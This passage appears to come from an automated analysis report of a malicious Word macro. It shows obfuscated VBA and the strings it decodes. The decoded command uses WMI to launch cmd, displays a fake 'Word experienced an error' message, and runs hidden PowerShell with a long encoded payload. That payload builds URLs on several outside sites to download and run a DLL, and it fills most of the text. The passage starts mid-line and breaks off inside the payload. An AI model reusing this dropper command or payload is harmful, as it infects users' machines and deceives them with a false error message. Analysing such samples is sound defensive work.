sh bYgAx [ sh biACx [ sh bkAIx [ sh bAAgx [ sh bACgx [ sh bAIAx [ sh bBbAx [ sh bFQAx [ sh bWQBx [ sh bwAEx [ sh bUAXx [ sh bQAox [ sh bACIx [ sh bAewx [ sh bAxAx [ sh bH0Ax [ sh bewAx [ sh byAHx [ sh b0Aex [ sh bwA0x [ sh bAH0x [ sh bAewx [ sh bA1Ax [ sh bH0Ax [ sh bewAx [ sh bwAHx [ sh b0Aex [ sh bwAzx [ sh bAH0x [ sh bAewx [ sh bA2Ax [ sh bH0Ax [ sh bIgAx [ sh bgACx [ sh b0ARx [ sh bgAgx [ sh bACcx [ sh bAVAx [ sh bBPAx [ sh bCcAx [ sh bLAAx [ sh bnAFx [ sh bMAWx [ sh bQBTx [ sh bAFQx [ sh bAZQx [ sh bAnAx [ sh bCwAx [ sh bJwBx [ sh bNACx [ sh b4ASx [ sh bQBvx [ sh bAC4x [ sh bAZAx [ sh bBpAx [ sh bCcAx [ sh bLAAx [ sh bnAFx [ sh bIAJx [ sh bwAsx [ sh bACcx [ sh bAcgx [ sh bBlAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh bMAJx [ sh bwAsx [ sh bACcx [ sh bAWQx [ sh bAnAx [ sh bCkAx [ sh bIAAx [ sh bgACx [ sh bkAIx [ sh bAAgx [ sh bADsx [ sh bAIAx [ sh bAgAx [ sh bCAAx [ sh bJABx [ sh b5AHx [ sh bcATx [ sh bQA5x [ sh bAG4x [ sh bAIAx [ sh bA9Ax [ sh bFsAx [ sh bdABx [ sh bZAFx [ sh bAARx [ sh bQBdx [ sh bACgx [ sh bAIgx [ sh bB7Ax [ sh bDUAx [ sh bfQBx [ sh b7ADx [ sh bAAfx [ sh bQB7x [ sh bADMx [ sh bAfQx [ sh bB7Ax [ sh bDIAx [ sh bfQBx [ sh b7ADx [ sh bQAfx [ sh bQB7x [ sh bADEx [ sh bAfQx [ sh bAiAx [ sh bCAAx [ sh bLQBx [ sh bGACx [ sh bAAJx [ sh bwBux [ sh bAEUx [ sh bAdAx [ sh bAuAx [ sh bHMAx [ sh bZQBx [ sh bSAFx [ sh bYAJx [ sh bwAsx [ sh bACcx [ sh bAZQx [ sh bBSAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh bkAbx [ sh bgBUx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bGkAx [ sh bQwBx [ sh bFAFx [ sh bAAbx [ sh bwAnx [ sh bACwx [ sh bAJwx [ sh bBtAx [ sh bGEAx [ sh bTgBx [ sh bBAEx [ sh bcAJx [ sh bwAsx [ sh bACcx [ sh bAUwx [ sh bBZAx [ sh bHMAx [ sh bdABx [ sh bFAEx [ sh b0ALx [ sh bgAnx [ sh bACkx [ sh bAIAx [ sh bAgAx [ sh bDsAx [ sh bIAAx [ sh bgACx [ sh bQAUx [ sh bwA0x [ sh bAGsx [ sh bANgx [ sh bB0Ax [ sh bHIAx [ sh bagAx [ sh b9ACx [ sh bQATx [ sh bgA2x [ sh bADkx [ sh bARwx [ sh bAgAx [ sh bCsAx [ sh bIABx [ sh bbAGx [ sh bMAax [ sh bABhx [ sh bAHIx [ sh bAXQx [ sh bAoAx [ sh bDMAx [ sh bMwAx [ sh bpACx [ sh bAAKx [ sh bwAgx [ sh bACQx [ sh bATwx [ sh bAyAx [ sh bF8Ax [ sh bUAAx [ sh b7ACx [ sh bQARx [ sh bwAxx [ sh bADQx [ sh bAUQx [ sh bA9Ax [ sh bCgAx [ sh bJwBx [ sh bVACx [ sh bcAKx [ sh bwAox [ sh bACcx [ sh bAMwx [ sh bAnAx [ sh bCsAx [ sh bJwAx [ sh b2AEx [ sh b4AJx [ sh bwApx [ sh bACkx [ sh bAOwx [ sh bAgAx [ sh bCQAx [ sh bMABx [ sh bJADx [ sh bkAZx [ sh bgB6x [ sh bAGIx [ sh bAOgx [ sh bA6Ax [ sh bCIAx [ sh bQwBx [ s) -> 21436 executed
195	nnjasd = Kfgztxaw46z(njcnja)
196	Goto xDvjIOBFP
197	Set LvygECNI = SDiGFGB	SDiGFGB
198	Dim kVqKGDIMx, SXiaV, yoTKwqIsG as Long
199	Dim zEMxFGC as Word.Paragraph
200	Dim ZrdKv() as Byte
201	For Each zEMxFGC in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
202	ZrdKv = zEMxFGC.Range	Range
203	dscc = "sadsaccc" & zEMxFGC.Range	Range
204	SXiaV = UBound(ZrdKv) - 1	UBound
205	kVqKGDIMx = 0
206	Set SbJQC = OeKxDTJnB	OeKxDTJnB
207	Do Until SXiaV > SXiaV
208	If ZrdKv(SXiaV) = 46 Or SXiaV = SXiaV Then
209	dscc = "sasdsacc" & (kVqKGDIMx / 2) + 1 & " to " & (SXiaV / 2) + 1 & MidB$(ZrdKv, kVqKGDIMx + 1, SXiaV - kVqKGDIMx + 3)	MidB$
210	kVqKGDIMx = SXiaV + 2
211	Endif
212	SXiaV = SXiaV + 2
213	Loop
214	Next	Paragraphs
214	xDvjIOBFP:
216	Jfxhwoyn1nrrxfe.Create nnjasd, O4diqcx_e7ge, Soumelol3sb_6v	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB,,) -> 0 O4diqcx_e7ge Soumelol3sb_6v executed
217	Goto EaHQHNPDJ
218	Set vIKvGtHY = WFlaEdEJF	WFlaEdEJF
219	Dim jqLChB, ruGLP, zsUxsFG as Long
220	Dim PmwneAAr as Word.Paragraph
221	Dim DjGAF() as Byte
222	For Each PmwneAAr in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
223	DjGAF = PmwneAAr.Range	Range
224	dscc = "sadsaccc" & PmwneAAr.Range	Range
225	ruGLP = UBound(DjGAF) - 1	UBound
226	jqLChB = 0
227	Set iqbgCC = fAEnDfCC	fAEnDfCC
228	Do Until ruGLP > ruGLP
229	If DjGAF(ruGLP) = 46 Or ruGLP = ruGLP Then
230	dscc = "sasdsacc" & (jqLChB / 2) + 1 & " to " & (ruGLP / 2) + 1 & MidB$(DjGAF, jqLChB + 1, ruGLP - jqLChB + 3)	MidB$
231	jqLChB = ruGLP + 2
232	Endif
233	ruGLP = ruGLP + 2
234	Loop
235	Next	Paragraphs
235	EaHQHNPDJ:
237	End Function

Function T0ljxv29dexr3v2yt, APIs: 44, Strings: 37, Number of lines: 123, Relevance: 147.123

APIs	Meta Information
nWxKMVOBG
Paragraphs
Range
Range
UBound
yXAkDJC
MidB$
zOxiWIIb
Paragraphs
Range
Range
UBound
wjUEXtp
MidB$
pXYQI
Paragraphs
Range
Range
UBound
VHaeE
MidB$
Replace	Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process Replace("x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAAx [ sh bgAFx [ sh bMAZx [ sh bQBUx [ sh bAC0x [ sh bAaQx [ sh bBUAx [ sh bEUAx [ sh bbQAx [ sh bgACx [ sh bgAIx [ sh bgB2x [ sh bAEEx [ sh bAUgx [ sh bBpAx [ sh bCIAx [ sh bKwAx [ sh biAGx [ sh bEAYx [ sh bgBMx [ sh bAGUx [ sh bAOgx [ sh bAwAx [ sh bGkAx [ sh bIgAx [ sh brACx [ sh bIAOx [ sh bQBmx [ sh bACIx [ sh bAKwx [ sh bAiAx [ sh bFoAx [ sh bYgAx [ sh biACx [ sh bkAIx [ sh bAAgx [ sh bACgx [ sh bAIAx [ sh bBbAx [ sh bFQAx [ sh bWQBx [ sh bwAEx [ sh bUAXx [ sh bQAox [ sh bACIx [ sh bAewx [ sh bAxAx [ sh bH0Ax [ sh bewAx [ sh byAHx [ sh b0Aex [ sh bwA0x [ sh bAH0x [ sh bAewx [ sh bA1Ax [ sh bH0Ax [ sh bewAx [ sh bwAHx [ sh b0Aex [ sh bwAzx [ sh bAH0x [ sh bAewx [ sh bA2Ax [ sh bH0Ax [ sh bIgAx [ sh bgACx [ sh b0ARx [ sh bgAgx [ sh bACcx [ sh bAVAx [ sh bBPAx [ sh bCcAx [ sh bLAAx [ sh bnAFx [ sh bMAWx [ sh bQBTx [ sh bAFQx [ sh bAZQx [ sh bAnAx [ sh bCwAx [ sh bJwBx [ sh bNACx [ sh b4ASx [ sh bQBvx [ sh bAC4x [ sh bAZAx [ sh bBpAx [ sh bCcAx [ sh bLAAx [ sh bnAFx [ sh bIAJx [ sh bwAsx [ sh bACcx [ sh bAcgx [ sh bBlAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh bMAJx [ sh bwAsx [ sh bACcx [ sh bAWQx [ sh bAnAx [ sh bCkAx [ sh bIAAx [ sh bgACx [ sh bkAIx [ sh bAAgx [ sh bADsx [ sh bAIAx [ sh bAgAx [ sh bCAAx [ sh bJABx [ sh b5AHx [ sh bcATx [ sh bQA5x [ sh bAG4x [ sh bAIAx [ sh bA9Ax [ sh bFsAx [ sh bdABx [ sh bZAFx [ sh bAARx [ sh bQBdx [ sh bACgx [ sh bAIgx [ sh bB7Ax [ sh bDUAx [ sh bfQBx [ sh b7ADx [ sh bAAfx [ sh bQB7x [ sh bADMx [ sh bAfQx [ sh bB7Ax [ sh bDIAx [ sh bfQBx [ sh b7ADx [ sh bQAfx [ sh bQB7x [ sh bADEx [ sh bAfQx [ sh bAiAx [ sh bCAAx [ sh bLQBx [ sh bGACx [ sh bAAJx [ sh bwBux [ sh bAEUx [ sh bAdAx [ sh bAuAx [ sh bHMAx [ sh bZQBx [ sh bSAFx [ sh bYAJx [ sh bwAsx [ sh bACcx [ sh bAZQx [ sh bBSAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh bkAbx [ sh bgBUx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bGkAx [ sh bQwBx [ sh bFAFx [ sh bAAbx [ sh bwAnx [ sh bACwx [ sh bAJwx [ sh bBtAx [ sh bGEAx [ sh bTgBx [ sh bBAEx [ sh bcAJx [ sh bwAsx [ sh bACcx [ sh bAUwx [ sh bBZAx [ sh bHMAx [ sh bdABx [ sh bFAEx [ sh b0ALx [ sh bgAnx [ sh bACkx [ sh bAIAx [ sh bAgAx [ sh bDsAx [ sh bIAAx [ sh bgACx [ sh bQAUx [ sh bwA0x [ sh bAGsx [ sh bANgx [ sh bB0Ax [ sh bHIAx [ sh bagAx [ sh b9ACx [ sh bQATx [ sh bgA2x [ sh bADkx [ sh bARwx [ sh bAgAx [ sh bCsAx [ sh bIABx [ sh bbAGx [ sh bMAax [ sh bABhx [ sh bAHIx [ sh bAXQx [ sh bAoAx [ sh bDMAx [ sh bMwAx [ sh bpACx [ sh bAAKx [ sh bwAgx [ sh bACQx [ sh bATwx [ sh bAyAx [ sh bF8Ax [ sh bUAAx [ sh b7ACx [ sh bQARx [ sh bwAxx [ sh bADQx [ sh bAUQx [ sh bA9Ax [ sh bCgAx [ sh bJwBx [ sh bVACx [ sh bcAKx [ sh bwAox [ sh bACcx [ sh bAMwx [ sh bAnAx [ sh bCsAx [ sh bJwAx [ sh b2AEx [ sh b4AJx [ sh bwApx [ sh bACkx [ sh bAOwx [ sh bAgAx [ sh bCQAx [ sh bMABx [ sh bJADx [ sh bkAZx [ sh bgB6x [ sh bAGIx [ sh bAOgx [ sh bA6Ax [ sh bCIAx [ sh bQwBx [ sh b,"x [ sh b",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4
Kyd2hcsqro5y2rxia
kUGXaZ
Paragraphs
Range
Range
UBound
mEsdJFB
MidB$
WUTQAet
Paragraphs
Range
Range
UBound
YMyjEGOO
MidB$
eUaictZE
Paragraphs
Range
Range
UBound
SuvbRJTD
MidB$

Strings	Decrypted Strings
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"x [ sh b"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"

Line	Instruction	Meta Information
324	Function T0ljxv29dexr3v2yt(Qaleihvcbuiho33)
325	Goto KBiNIsVg	executed
326	Set HrGdJP = nWxKMVOBG	nWxKMVOBG
327	Dim mUryG, IQtMAu, iXqMIB as Long
328	Dim ZQoRFxD as Word.Paragraph
329	Dim ifLwTt() as Byte
330	For Each ZQoRFxD in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
331	ifLwTt = ZQoRFxD.Range	Range
332	dscc = "sadsaccc" & ZQoRFxD.Range	Range
333	IQtMAu = UBound(ifLwTt) - 1	UBound
334	mUryG = 0
335	Set JWFlPMBdA = yXAkDJC	yXAkDJC
336	Do Until IQtMAu > IQtMAu
337	If ifLwTt(IQtMAu) = 46 Or IQtMAu = IQtMAu Then
338	dscc = "sasdsacc" & (mUryG / 2) + 1 & " to " & (IQtMAu / 2) + 1 & MidB$(ifLwTt, mUryG + 1, IQtMAu - mUryG + 3)	MidB$
339	mUryG = IQtMAu + 2
340	Endif
341	IQtMAu = IQtMAu + 2
342	Loop
343	Next	Paragraphs
343	KBiNIsVg:
345	Goto sZNckH
346	Set fQjtHB = zOxiWIIb	zOxiWIIb
